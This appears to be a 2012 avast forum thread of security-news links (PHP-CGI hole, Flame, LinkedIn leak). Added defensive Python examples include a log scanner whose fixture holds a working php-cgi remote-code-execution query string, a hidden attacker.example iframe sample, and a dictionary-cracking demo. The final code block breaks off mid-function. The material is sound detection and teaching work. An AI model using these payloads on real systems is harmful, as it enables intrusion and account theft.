I have for some time been using mainly trouble free and up to date versions of Super Antispyware, Comodo Firewall and Avast Antivirus. A couple of weeks ago Avast suddenly informed me that my system was/is still ‘Unsecured’ and ever since apparently refuses to Update both Engine and Virus Definitions. The Avast ‘FIX NOW’ button ignores the request; also there is a red cross on the Avast tray icon. However in Control Panel/Security Centre, Comodo Firewall is ‘On’ and ‘Avast Antivirus is also ‘On’ and is reported as ‘up to date and virus scanning is on’, as it always was! So can anyone throw any light on why for the past two or so weeks I have been plagued with confusing messages? The P.C. in general appears to be running OK. Many thanks for any advice
-
Please create your own new topic as this is unrelated to your problem. This topic isn't a problem solving/reporting on but for posting security based warnings and or notices (unrelated to avast as such).
- Please start a New Topic of your own here http://forum.avast.com/index.php?board=2.0 (click the New topic button at the top of the page, see image) as this is unrelated to the original subject and will just confuse the topic, and we will try to help.
-
Re: Critical open hole in PHP creates risks
@Asyn,
The patch for the vulnerability is going to be available for download tonight.
Recent abuse: http://blog.spiderlabs.com/2012/05/honeypot-alert-active-exploit-attempts-for-php-cgi-vuln.html link article author: Ryan Barnett
polonus
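The exploit attempts the SpiderLabs honeypot post describes are easy to spot in web-server logs once you know the mechanism. This is an added example, not code from polonus's post or from the SpiderLabs article: the php-cgi argument-injection hole (CVE-2012-1823) works because, when PHP runs as a CGI binary, a query string containing no literal "=" is handed to the script as command-line arguments (the CGI specification's "indexed query" rule, splitting on "+"), so a request such as `?-s` or `?-d+allow_url_include%3d1` reaches php-cgi as options; the `%3d` encoding slips past the "=" check because that check runs on the raw string. The scanner below reproduces that rule over constructed Apache-style log lines and flags requests whose resulting argv contains php-cgi options.

```python
"""Added example: flag php-cgi argument-injection (CVE-2012-1823) attempts in web logs."""
import re
from urllib.parse import unquote

# Combined log format; only the fields we need are named
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# php-cgi options worth flagging: -s dumps source, -d sets INI directives (the RCE path),
# -n/-c choose the config file; the rest are mostly reconnaissance but prove argv is reachable
PHP_CGI_OPTIONS = ("-s", "-d", "-n", "-c", "-T", "-h", "-i")


def query_as_argv(uri):
    """Mimic the CGI gateway: if the raw query string has no '=', split it on '+'
    and URL-decode each token; that list is what php-cgi would receive as argv.
    Returns [] when the query would be passed as an ordinary QUERY_STRING instead."""
    if "?" not in uri:
        return []
    raw_qs = uri.split("?", 1)[1]
    if "=" in raw_qs:
        return []
    return [unquote(tok) for tok in raw_qs.split("+") if tok]


def classify(uri):
    """('attack', argv) if the gateway-built argv carries a php-cgi option,
    ('indexed-query', argv) for other '='-less queries, ('ok', []) otherwise."""
    argv = query_as_argv(uri)
    if not argv:
        return "ok", argv
    for tok in argv:
        if tok[:2] in PHP_CGI_OPTIONS:   # "-dallow_url_include=1" counts the same as "-d"
            return "attack", argv
    return "indexed-query", argv


def scan(lines):
    """Return (ip, uri, argv) for every parseable line classified as an attack."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict, argv = classify(m.group("uri"))
        if verdict == "attack":
            hits.append((m.group("ip"), m.group("uri"), argv))
    return hits


# Constructed log lines (TEST-NET addresses): two exploit attempts, two legitimate requests
SAMPLE_LOG = [
    '203.0.113.5 - - [08/May/2012:10:12:01 +0000] "GET /index.php?-s HTTP/1.1" 200 512',
    '203.0.113.5 - - [08/May/2012:10:12:03 +0000] "POST /cgi-bin/php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 89',
    '198.51.100.7 - - [08/May/2012:10:12:05 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048',
    '198.51.100.9 - - [08/May/2012:10:12:07 +0000] "GET /search.php?foo+bar HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, uri, argv in scan(SAMPLE_LOG):
        print(f"{ip}  {uri}\n    php-cgi would see argv: {argv}")
```

The second sample line is the remote-code-execution form: `-d allow_url_include=1 -d auto_prepend_file=php://input` makes php-cgi execute whatever the attacker puts in the POST body. A 200 response to that request is worth treating as a compromise, not merely an attempt.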
-
Skype divulges user IP addresses
http://www.h-online.com/security/news/item/Skype-divulges-user-IP-addresses-Update-1564236.html
http://skype-open-source.blogspot.com/2012/04/skype-user-ip-address-disclosure.html
This happens when some 'genius' decides that the avatar's picture and information are a 'file transfer'
and, instead of using your UID/session ID to route it through supernodes,
it will use direct P2P connectivity and share all the info with the other side.
Seriously, Microsoft is offering GBs of cloud data on SkyDrive but can't host the avatar picture and info data of Skype users :)
-
VMware address critical issues in Workstation, Player, ESXi and ESX
http://www.h-online.com/security/news/item/VMware-address-critical-issues-in-Workstation-Player-ESXi-and-ESX-1568119.html
http://www.vmware.com/security/advisories/VMSA-2012-0009.html
-
Re: Critical open hole in PHP creates risks
@Asyn,
The patch for the vulnerability is going to be available for download tonight.
Thanks pol.
Here it is: http://www.php.net/archive/2012.php#id2012-05-08-1
-
***
Apple iOS 5.1.1 Released to Address Security Issues
Apple's latest update for its mobile devices, iOS 5.1.1, is released to fix annoying bugs and some serious security issues.
Apple released the latest update to its iOS software for the iPhone, iPod touch and iPad to fix bugs and repair security issues. The iOS 5.1.1 addresses bugs that could prevent the new iPad from switching between 2G and 3G networks and fixes bugs that affected AirPlay video playback in some circumstances, as well as security issues concerning Apple's Safari browser. The update can be downloaded via Apple’s Website, iTunes or over the air on compatible devices.
http://www.eweek.com/c/a/Mobile-and-Wireless/Apple-iOS-511-Released-to-Address-Security-Issues-124181/?kc=EWKNLEDP05092012B
***
-
Apple Legacy Filevault Hole
http://cryptome.org/2012/05/apple-filevault-hole.htm
-
Thousands of Twitter passwords allegedly exposed
http://www.h-online.com/security/news/item/Thousands-of-Twitter-passwords-allegedly-exposed-1571195.html
-
Malware Installed on Travelers' Laptops Through Software Updates on Hotel Internet Connections
http://www.ic3.gov/media/2012/120508.aspx
-
Sniffer tool displays other people's WhatsApp messages
http://www.h-online.com/security/news/item/Sniffer-tool-displays-other-people-s-WhatsApp-messages-1574382.html
-
Plaxo - Google Account “Suspicious Activity” & Next Steps
http://blog.plaxo.com/2012/05/google-account-%E2%80%9Csuspicious-activity%E2%80%9D-next-steps/
-
Dr.Web CureIt! 7.0 beta testing launched
http://news.drweb.com/show/?i=2401&lng=en&c=5
https://www.freedrweb.com/download+cureit+free/beta/?lng=en
Win32.Rmnet.16 attacks UK and Australia
http://news.drweb.com/?i=2434&c=5&lng=en&p=0
-
Bitcoinica Bitcoin site breached
http://www.h-online.com/security/news/item/Bitcoinica-Bitcoin-site-breached-1574907.html
http://www.bitcoinica.com/2012/05/bitcoinica-security-breach.html
-
Notepad++ web site compromised
http://www.h-online.com/security/news/item/Notepad-web-site-compromised-1575263.html
-
Malicious use of Catchme to remove security plug-ins: Interesting: http://blog.trendmicro.com/info-stealer-poses-as-google-chrome-installer/
link article author is Brian Cayanan (Threats Analyst)
Several Brazilian banks use a program called GbPlugin to protect customers during Internet banking. The malware, however, uses security software firm GMER's Catchme to remove this security plugin.
Catchme is designed to remove malware, but the malversants use it the other way round, to remove protective security software.
Meanwhile, more than 3,000 unique IP addresses are being infected with the mentioned Trojan horse.
polonus
-
Watch Out for the Windows Telephone Scam
http://blogs.norman.com/2012/for-consumption/watch-out-for-the-windows-telephone-scam
and here you can listen to a recorded phone scam
Fake tech support call scam – supportonclick, systemrecure and logmein123.com
http://www.digitaltoast.co.uk/supportonclick-systemrecure-scam
-
That really is an old one with a different name; previously they were calling themselves 'Microsoft Support' as opposed to Windows Support.
These scum have been pulling these type of telephone scams for some time.
-
Another phone call scam but this is on behalf of Google.
http://www.bleepingcomputer.com/forums/topic453721.html
-
***
Facebook, Gmail, Hotmail, Yahoo Users Hit by Zeus Debit Card Scam
A malware campaign targeting Facebook, Google Mail, Hotmail and Yahoo user debit card data has been linked to the infamous Zeus Trojan.
Zeus is one of the most prevalent pieces of financial malware on the Web. During the past several years, Zeus variants have been linked to major criminal operations around the globe, including one that prompted the FBI to issue a warning in January. In that case, a variant known as Gameover was observed stealing password and user name information for financial institutions.
http://www.eweek.com/c/a/Security/Facebook-Gmail-Hotmail-Yahoo-Users-Hit-By-Zeus-Debit-Card-Scam-886976/?kc=EWKNLEDP05182012D
***
-
ZTE Score M Android Phone Found to Have Backdoor Installed
http://threatpost.com/en_us/blogs/report-zte-score-m-android-phone-found-have-backdoor-installed-051812
-
Lily Jade, Cross Browser Worm spreads through Facebook
http://facecrooks.com/Scam-Watch/lily-jade-cross-browser-worm-spreads-via-facebook.html
-
Zeus bot comes now also as ransomware: http://www.f-secure.com/weblog/archives/00002367.html (link authors: Mikko S. and Marko)
polonus
-
Global Payments breach reportedly worse than expected
http://www.h-online.com/security/news/item/Global-Payments-breach-reportedly-worse-than-expected-1578956.html
-
***
IPv6 and Security: The Threat From Version 4
The official launch date for IPv6 is right around the corner, making June 6 famous for even more than the historic WW II invasion of Normandy. It might make the invasion of your customers’ networks more possible than ever before.
The higher threat level, according to Carl Herberger, vice president of security at Radware, lies in the fact that while IPv6 will be the new standard at the wide area, the local area will continue to be the near exclusive domain of IPv4. And since the two versions were not designed to co-exist, there are some gaping holes in security.
“You basically need to translate Version 6 to Version 4 and we can do that by encapsulation,” Herberger explained to CRN. “And the encapsulation standards are all over the map. This situation causes problems with security inspections because if I can send an attack that exploits Version 4 vulnerabilities through a Version 6 inspection module, I’ve got a pretty high chance of success because the Version 6 inspection module will not be able to read it. And we haven't been able to resolve this problem yet.”
http://www.crn.com/news/security/240000767/ipv6-and-security-the-threat-from-version-4.htm?cid=nl_sec
***
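The failure Herberger describes is concrete enough to show in code. The following is an added example, not code from the CRN article or from anyone in this thread: a toy inspection module that parses only the outer IPv6 header and passes anything that is not TCP, next to one that unwraps IP-in-IP encapsulation (next header 4 for IPv4-in-IPv6, 41 for IPv6-in-IPv6) before running the same signature check. The packets, addresses and the "attack" signature are constructed for the example; a real engine would also have to handle the other tunnelling encapsulations the article alludes to (6to4, Teredo, GRE), which is the point about the standards being "all over the map".

```python
"""Added example: outer-header-only inspection versus encapsulation-aware inspection."""
import struct

# IANA protocol / next-header numbers
IPV4_IN_IP = 4     # IPv4 datagram carried inside another IP header (RFC 2003 / RFC 2473)
TCP = 6
IPV6_IN_IP = 41    # IPv6 datagram carried inside another IP header

# Constructed signature standing in for an IPv4-era IDS rule
SIGNATURE = b"GET /cgi-bin/exploit"


def ipv6_header(next_header, payload):
    """Build a 40-byte IPv6 header (documentation prefix 2001:db8::/32) plus payload."""
    src = bytes.fromhex("20010db8000000000000000000000001")
    dst = bytes.fromhex("20010db8000000000000000000000002")
    return struct.pack("!IHBB", 6 << 28, len(payload), next_header, 64) + src + dst + payload


def ipv4_header(protocol, payload):
    """Build a 20-byte IPv4 header (TEST-NET-1 addresses, checksum left zero) plus payload."""
    src, dst = bytes([192, 0, 2, 1]), bytes([192, 0, 2, 2])
    hdr = struct.pack("!BBHHHBBH", 0x45, 0, 20 + len(payload), 0, 0, 64, protocol, 0)
    return hdr + src + dst + payload


def tcp_segment(dst_port, payload):
    """Build a minimal 20-byte TCP header (data offset 5, PSH|ACK) plus payload."""
    return struct.pack("!HHIIBBHHH", 40000, dst_port, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload


def naive_inspect(packet):
    """The weak module: looks at the outer IPv6 header only.

    Anything whose next header is not TCP is treated as 'not mine' and passed,
    so an IPv4 attack tunnelled inside IPv6 is never examined."""
    if packet[0] >> 4 != 6:
        return "pass"
    if packet[6] != TCP:
        return "pass"
    return "block" if SIGNATURE in packet[40 + 20:] else "pass"


def unwrap(packet, depth=0, max_depth=4):
    """Strip IP-in-IP layers of either version and return (transport_protocol, payload).

    Returns (None, b'') for unparseable input or nesting deeper than max_depth,
    so the caller can fail closed rather than be walked past its limit."""
    if depth > max_depth or len(packet) < 20:
        return None, b""
    version = packet[0] >> 4
    if version == 6:
        if len(packet) < 40:
            return None, b""
        nh, payload = packet[6], packet[40:]
    elif version == 4:
        ihl = (packet[0] & 0x0F) * 4
        nh, payload = packet[9], packet[ihl:]
    else:
        return None, b""
    if nh in (IPV4_IN_IP, IPV6_IN_IP):
        return unwrap(payload, depth + 1, max_depth)
    return nh, payload


def hardened_inspect(packet):
    """Inspect the innermost transport payload regardless of encapsulation."""
    proto, payload = unwrap(packet)
    if proto is None:
        return "block"          # fail closed on garbage or excessive nesting
    if proto != TCP:
        return "pass"
    if len(payload) < 20:
        return "block"
    data_offset = (payload[12] >> 4) * 4
    return "block" if SIGNATURE in payload[data_offset:] else "pass"


def build_plain_attack():
    """IPv6 / TCP / signature: both inspectors see it."""
    return ipv6_header(TCP, tcp_segment(80, SIGNATURE + b" HTTP/1.0\r\n\r\n"))


def build_tunnelled_attack():
    """IPv6 / IPv4 / TCP / signature: the v4 attack hidden behind a v6 outer header."""
    inner = ipv4_header(TCP, tcp_segment(80, SIGNATURE + b" HTTP/1.0\r\n\r\n"))
    return ipv6_header(IPV4_IN_IP, inner)


def build_tunnelled_benign():
    """IPv6 / IPv4 / TCP with an ordinary request: must not be blocked."""
    inner = ipv4_header(TCP, tcp_segment(80, b"GET / HTTP/1.0\r\n\r\n"))
    return ipv6_header(IPV4_IN_IP, inner)


if __name__ == "__main__":
    for name, pkt in (("plain", build_plain_attack()),
                      ("tunnelled", build_tunnelled_attack()),
                      ("benign", build_tunnelled_benign())):
        print(f"{name:10s} naive={naive_inspect(pkt):5s} hardened={hardened_inspect(pkt)}")
```

The depth limit in `unwrap` is deliberate: an inspector that chases encapsulation without bound can itself be tied up by a packet nested dozens of layers deep, so beyond a small depth the hardened version drops the packet instead of continuing to peel it.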
-
Anonymous leaks US government crime statistics data
http://www.h-online.com/security/news/item/Anonymous-leaks-US-government-crime-statistics-data-1581535.html
-
Virut, the dangerous and destructive file-infector malware that has been with us for 5 years now, is making a comeback:
http://vrt-blog.snort.org/2012/05/resurgence-of-virut.html (link article author = ALAIN ZIDOUEMBA)
polonus
-
Facebook account cancellation malware poses as Adobe Flash update
http://nakedsecurity.sophos.com/2012/05/21/facebook-account-cancellation-malware-adobe-flash-update/
-
Thousands affected in billing cloud breach
http://www.scmagazine.com.au/News/301773,thousands-affected-in-billing-cloud-breach.aspx
http://blog.whmcs.com/?t=47717
-
Google warns DNSChanger victims
http://www.h-online.com/security/news/item/Google-warns-DNSChanger-victims-1583037.html
-
How to Keep Your Facebook Data Private from Apps
http://blogs.norman.com/2012/for-consumption/how-to-keep-your-facebook-data-private-from-apps
-
Text message provider to pay out for Android malware
http://www.h-online.com/security/news/item/Text-message-provider-to-pay-out-for-Android-malware-1585215.html
-
Text message provider to pay out for Android malware
http://www.h-online.com/security/news/item/Text-message-provider-to-pay-out-for-Android-malware-1585215.html
The text message provider was actually fined for distributing malware.
-
No country is safe from 'Flame Super-virus'
http://www.news.com.au/technology/no-country-is-safe-from-flame-super-virus-attack-kaspersky-labs/story-e6frfro0-1226370960217
http://www.techweekeurope.co.uk/news/flamer-cyber-attack-iran-80049
-
Microsoft Warns Of Ongoing Conficker Infections
http://www.techweekeurope.co.uk/news/microsoft-ongoing-conficker-75066
-
***
Romanian Police Arrest Anonymous Hackers
Romanian Police on Monday announced that they had wiped out the local branch of the Anonymous hacker group after detaining 12 of its members.
On Monday police raided the homes of the members in ten towns and cities across the country, searching for evidence, including files and personal computers.
“The head of the group was 24-year-old Gabriel Balaneasa who, together with other two people, created the Anonymous group in Romania. This group accessed and compromised 29 websites in Romania and abroad,” police said in a press release.
http://www.balkaninsight.com/en/article/romanian-police-arrests-local-hackers
***
-
***
DOJ Hack Emphasizes the Need for Smart Cybersecurity Action
Last week, the U.S. Justice Department acknowledged that its Bureau of Justice Statistics website had been hacked. The hacker group Anonymous claimed credit for the hack and published 1.7 gigabytes of data. Included in the data were internal e-mails, which possibly contained personal or sensitive information related to crimes, criminals, and crime victims.
http://blog.heritage.org/2012/05/29/doj-hack-emphasizes-the-need-for-smart-cybersecurity-action/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+FoundryConservativePolicyNews+%28The+Foundry%3A+Conservative+Policy+News.%29
***
-
Critical vulnerability derails Ruby on Rails
http://www.h-online.com/security/news/item/Critical-vulnerability-derails-Ruby-on-Rails-1588773.html
-
Obama, cyber attacks against Iran and Stuxnet
http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=2&hp
-
Big ongoing malware campaign - Detected BlackHole exploit kit HTTP GET request -- Detected malicious injected iframe -
flagged by urlQuery.net scan alerts,
Google, for instance, this search query for the iframe source URL: htxp%3A%2F%2Fmazdaforumi.ru%3A8080%2Fforum%2Fshowthread.php%3Fpage%3D5fa58bce769e5c2c
and you will find a lot of sites that were infected recently...
also see: htxp://blog.dynamoo.com/2012/06/linkedin-spam-immerialtvru.html (link source article from The LinkedIn Team)
Reported to virus AT avast dot com,
polonus
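The injected iframes used by Blackhole campaigns like the one flagged above are usually loaded from a third-party host, often on a non-standard port, and are kept invisible with CSS or 1x1 dimensions. The scanner below is an added example, not part of the post above and not a urlQuery.net or avast tool; it parses a page with Python's standard `html.parser`, collects every `<iframe>`, and reports those that match any of those traits. The sample HTML, the `attacker.example` host and the trusted-host list are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _dimension(value):
    """Parse width/height values like '1' or '1px'; None when not a plain pixel count."""
    digits = value.strip().lower().rstrip("px")
    return int(digits) if digits.isdigit() else None


def iframe_reasons(attrs, trusted_hosts):
    """Return the reasons an iframe looks like an injected loader (empty list when it looks benign)."""
    reasons = []
    url = urlparse(attrs.get("src", ""))
    host = (url.hostname or "").lower()
    if host and host not in trusted_hosts:
        reasons.append("third-party host " + host)
    if url.port not in (None, 80, 443):
        reasons.append("non-standard port %d" % url.port)
    style = attrs.get("style", "").replace(" ", "").lower()
    if "visibility:hidden" in style or "display:none" in style:
        reasons.append("hidden by CSS")
    w, h = _dimension(attrs.get("width", "")), _dimension(attrs.get("height", ""))
    if w is not None and h is not None and w <= 2 and h <= 2:
        reasons.append("%dx%d frame" % (w, h))
    return reasons


def scan_html(html, trusted_hosts=frozenset()):
    """Return [(src, reasons)] for every iframe that raised at least one reason."""
    collector = IframeCollector()
    collector.feed(html)
    hits = []
    for attrs in collector.iframes:
        reasons = iframe_reasons(attrs, trusted_hosts)
        if reasons:
            hits.append((attrs.get("src", ""), reasons))
    return hits


# Constructed sample page: one legitimate embed plus an injected hidden loader frame.
SAMPLE_HTML = """<html><body>
<h1>Forum</h1>
<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>
<iframe src="http://attacker.example:8080/forum/showthread.php?page=5fa58bce769e5c2c"
        width="1" height="1" style="visibility: hidden; position: absolute; left: -9999px"></iframe>
</body></html>"""

TRUSTED_HOSTS = frozenset({"www.youtube.com"})

if __name__ == "__main__":
    for src, reasons in scan_html(SAMPLE_HTML, TRUSTED_HOSTS):
        print(src, "->", ", ".join(reasons))
```

Run against a saved copy of a suspect page it prints only the hidden 8080 frame, with all four reasons. Injected iframes are frequently emitted by obfuscated JavaScript rather than present in the static HTML, so a static scan like this is a first pass, not a substitute for rendering the page in a sandbox.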
-
Meet the little box that could stop Flame and Stuxnet
http://news.cnet.com/8301-1009_3-57443738-83/meet-the-little-box-that-could-stop-flame-and-stuxnet/
-
Lots of Dutch users targeted by LicenseValidator.ex- , see: http://www.threatexpert.com/report.aspx?md5=5ae919b80bbec754f2e98c2d28ae5628
See: http://www.symantec.com/security_response/writeup.jsp?docid=2012-051102-1813-99&tabid=2
This trojan is an HTTPS-proxy infostealer; especially Firefox, Opera, Maxthon and IE browsers are infected via a Blackhole Exploit kit or an infected attachment,
polonus
-
Why antivirus companies like mine failed to catch Flame and Stuxnet
http://arstechnica.com/security/2012/06/why-antivirus-companies-like-mine-failed-to-catch-flame-and-stuxnet/
-
http://www.pcadvisor.co.uk/news/software/3361791/microsoft-throws-kill-switch-on-own-certificates-after-flame-hijack/
Microsoft throws 'kill switch' on own certificates after Flame hijack.
(wondered why I got a Microsoft Update today)
-
***
Attackers Hit Weak Spots in 2-Factor Authentication
An attack late last week that compromised the personal and business Gmail accounts of Matthew Prince, chief executive of Web content delivery system CloudFlare, revealed a subtle but dangerous security flaw in the 2-factor authentication process used in Google Apps for business customers. Google has since fixed the glitch, but the incident offers a timely reminder that two-factor authentication schemes are only as secure as their weakest component.
http://krebsonsecurity.com/2012/06/attackers-target-weak-spots-in-2-factor-authentication/
***
-
***
6.46 million LinkedIn passwords leaked online
More than 6.4 million LinkedIn passwords have leaked to the Web after an apparent hack. Though some login details are encrypted, all users are advised to change their passwords.
A user on a Russian forum has claimed to have downloaded 6.46 million user hashed passwords from LinkedIn.
It looks as though some of the weaker passwords — around 300,000 of them — may have been cracked already. Other users have been seen reaching out to fellow hackers in an apparent bid to seek help in cracking the encryption.
Finnish security firm CERT-FI is warning that the hackers may have access to user email addresses also, though they appear encrypted and unreadable.
http://www.zdnet.com/blog/btl/646-million-linkedin-passwords-leaked-online/79290
***
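The reason 300,000 of the leaked hashes fell so quickly is that LinkedIn stored unsalted SHA-1: one dictionary pass cracks every account at once. The Python below is an added example, not code from ZDNet, CERT-FI or anyone in this thread. It runs a small constructed wordlist against three constructed accounts stored first as unsalted SHA-1 and then as PBKDF2-HMAC-SHA256 with a random per-user salt, and counts the work each attack needs. The wordlist, the account names and the iteration count are assumptions chosen to keep the demo fast.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for the dictionaries used on the cracking forums.
WORDLIST = ["password", "123456", "linkedin", "qwerty", "letmein", "welcome1"]


def sha1_hex(password):
    """Unsalted SHA-1, the scheme behind the leaked LinkedIn hashes."""
    return hashlib.sha1(password.encode()).hexdigest()


def crack_unsalted(leaked_hashes, wordlist):
    """Hash each word once, then look every leaked hash up in that table.

    Returns (cracked {hash: password}, number of hash computations)."""
    table = {sha1_hex(word): word for word in wordlist}
    cracked = {h: table[h] for h in leaked_hashes if h in table}
    return cracked, len(wordlist)


def hash_salted(password, salt=None, iterations=200_000):
    """PBKDF2-HMAC-SHA256 with a random per-user salt; returns (salt, derived_key)."""
    salt = salt if salt is not None else os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def verify_salted(password, salt, derived_key, iterations=200_000):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, derived_key)


def crack_salted(records, wordlist, iterations):
    """Per-user salts force one derivation per (user, word) pair; no shared table is possible.

    Returns (cracked {user: password}, number of derivations performed)."""
    cracked, work = {}, 0
    for user, (salt, derived_key) in records.items():
        for word in wordlist:
            work += 1
            if verify_salted(word, salt, derived_key, iterations):
                cracked[user] = word
                break
    return cracked, work


def demo(iterations=1_000):
    """Constructed accounts: two weak passwords and one that is not in the wordlist."""
    accounts = {"alice": "password", "bob": "linkedin", "carol": "Tr0ub4dor&3"}
    leaked = [sha1_hex(pw) for pw in accounts.values()]
    unsalted_found, unsalted_work = crack_unsalted(leaked, WORDLIST)
    records = {user: hash_salted(pw, iterations=iterations) for user, pw in accounts.items()}
    salted_found, salted_work = crack_salted(records, WORDLIST, iterations)
    return {
        "unsalted_cracked": sorted(unsalted_found.values()),
        "unsalted_hashes_computed": unsalted_work,
        "salted_cracked": sorted(salted_found.values()),
        "salted_derivations": salted_work,
        "salted_hmac_iterations": salted_work * iterations,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

Both schemes give up the two dictionary passwords, which is the other lesson of the leak: salting and stretching raise the attacker's cost per account, they do not rescue "password". The difference is in the work column: the unsalted attack costs one hash per word no matter how many of the 6.46 million accounts are in the dump, while the salted attack costs one full derivation per account per word.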
-
***
The world's worst password requirements list
The Attorney General of Texas Child Support website has the worst set of password requirements I've ever seen.
Here's another bad password policy, courtesy of TechRepublic:
... here's ING's 4-digit PIN login:
This one from the US Citizenship and Immigration Services site is very similar to the Texas one.
Is there a consultant somewhere telling state and federal governments how not to do passwords?
Please click the below the link to see explanations of the above statements.
http://kottke.org/12/06/the-worlds-worst-password-requirements-list
***
-
***
Facebook Security Team Warns Users About DNSChanger Malware
The security team at the world’s most populous social network over in Palo Alto, Calif., finally addressed the thorny issue of the DNSChanger malware to its users in a blog post on the Facebook Security page yesterday.
To the uninitiated, DNSChanger started popping up in security headlines earlier this year when it was targeted as part of an international botnet-takedown campaign dubbed "Operation Ghost Click." It has since proven itself to be a tenacious adversary with some in the industry believing that it may be impossible to completely scrub the Internet of DNSChanger.
... Facebook’s security team warns that users infected by DNSChanger will be shown ... warning message (which looks ominously similar to any number of Facebook scams) ...
Facebook notes that any individuals (not just those on Facebook) that fail to remove DNSChanger by the July 9th deadline may lose access to the Internet altogether.
You can find instructions on how to remove DNSChanger on the DCWG website ... http://www.dcwg.org/
http://threatpost.com/en_us/blogs/facebook-security-team-warns-users-about-dnschanger-malware-060512
***
-
***
Microsoft Patches Digital Certificate Issue Exploited by Flame
The minds behind the Flame attacks signed components of the malware with an unauthorized digital certificate to make it appear as though the code had been legitimately signed by Microsoft.
Microsoft issued an update June 3 to address a certificate issue exploited in the Flame malware attacks.
Flame, which was publicized by security researchers last week, is a cyber-espionage toolkit that incorporates a wide range of functionality, including intercepting Web traffic, recording audio and taking screenshots.
According to Microsoft, components of Flame were signed with an unauthorized digital certificate that chained up to a Microsoft sub-certification authority issued under the Microsoft Root Authority. This happened via the Terminal Server Licensing Service, which Microsoft operates to issue certificates to customers for "ancillary PKI- [public-key infrastructure-] based functions" in their enterprise.
By signing malware with fake certificates, attackers can trick browsers and applications into trusting malicious content, enabling activities such as phishing and man-in-the-middle attacks.
http://www.eweek.com/c/a/Security/Microsoft-Patches-Digital-Certificate-Flaw-Exploited-by-Flame-237271/?kc=EWKNLEDP06062012B
***
-
6.46 million LinkedIn passwords leaked online
http://www.h-online.com/security/news/item/LinkedIn-passwords-in-circulation-Update-1612022.html
http://arstechnica.com/security/2012/06/8-million-leaked-passwords-connected-to-linkedin/
http://www.h-online.com/security/features/Comment-LinkedIn-and-its-password-problems-1612877.html
-
Microsoft Security Bulletin Advance Notification for June 2012
http://technet.microsoft.com/en-us/security/bulletin/ms12-jun
-
Oracle Java SE Critical Patch Update Pre-Release Announcement - June 2012
http://www.oracle.com/technetwork/topics/security/javacpujun2012-1515912.html
-
Flame
http://www.securelist.com/en/blog/208193566/Flame_Replication_via_Windows_Update_MITM_proxy_server
The Flame inside Stuxnet
http://www.securelist.com/en/blog/208193568/Back_to_Stuxnet_the_missing_link
-
Microsoft Security Advisory (2719615)
Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2719615
-
Intel CPUs affected by VM privilege escalation exploit
http://www.h-online.com/open/news/item/Intel-CPUs-affected-by-VM-privilege-escalation-exploit-1616866.html
http://www.kb.cert.org/vuls/id/649219
-
I found this article about Flame Virus, URL: http://edition.cnn.com/2012/06/04/opinion/rushkoff-flame-virus/index.html
-
Oracle warns EBS users of auto-update to Java 7
http://www.h-online.com/security/news/item/Oracle-warns-EBS-users-of-auto-update-to-Java-7-1618753.html
https://blogs.oracle.com/stevenChan/entry/bulletin_disable_jre_auto_update
-
Firefox 13 tripped up by Flash patch
http://www.h-online.com/open/news/item/Firefox-13-tripped-up-by-Flash-patch-1619399.html
Edit: Fixed in FF 13.0.1
-
Microsoft Security Advisory (2719615)
Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2719615
Exploit for unpatched IE hole released
http://www.h-online.com/security/news/item/Exploit-for-unpatched-IE-hole-released-1619732.html
-
***
Sci-Fi-Like Network Monitoring System Scans Darknet for Possible Attacks
A 3D real-time network monitoring and alert system named DAEDALUS (Direct Alert Environment for Darknet And Livenet Unified Security) was created to scan malicious packets sent by viruses inside a local network, rather than monitoring outbound traffic.
The multitude of unused IP addresses within local networks is called “darknet.” A self-propagating virus first looks for viable computers to infest by scanning the entire range of local IP addresses. As not all addresses are allocated, DAEDALUS can monitor when suspicious packets are broadcast through the darknet, indicating that malware could be scanning for victims.
http://www.hotforsecurity.com/blog/sci-fi-like-network-monitoring-system-scans-darknet-for-possible-attacks-2426.html?goback=%2Egde_1003727_member_125535181%2Egde_1003727_member_126274564
***
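The detection idea behind DAEDALUS is simple enough to reproduce in a few lines: a legitimate host has no reason to talk to addresses nobody is using, so a source that touches several unallocated addresses in a short window is probably scanning. The Python below is an added example of that logic and is not DAEDALUS code or anything from the article. The /24, the list of live hosts and the flow-log lines are constructed; the log format (`timestamp src -> dst proto/port`) is an assumption.

```python
import ipaddress
from collections import defaultdict

# Constructed inventory: the monitored /24 and the addresses actually allocated to hosts.
SUBNET = ipaddress.ip_network("10.1.0.0/24")
LIVE_HOSTS = frozenset(ipaddress.ip_address(a)
                       for a in ("10.1.0.1", "10.1.0.10", "10.1.0.11", "10.1.0.50"))


def is_darknet(addr, subnet=SUBNET, live_hosts=LIVE_HOSTS):
    """True for an unallocated unicast address inside the subnet (network/broadcast excluded)."""
    return (addr in subnet
            and addr not in live_hosts
            and addr not in (subnet.network_address, subnet.broadcast_address))


def parse_flow(line):
    """Parse '<timestamp> <src> -> <dst> <proto>/<port>' (constructed flow-log format)."""
    timestamp, src, arrow, dst, service = line.split()
    if arrow != "->":
        raise ValueError("unexpected flow line: %r" % line)
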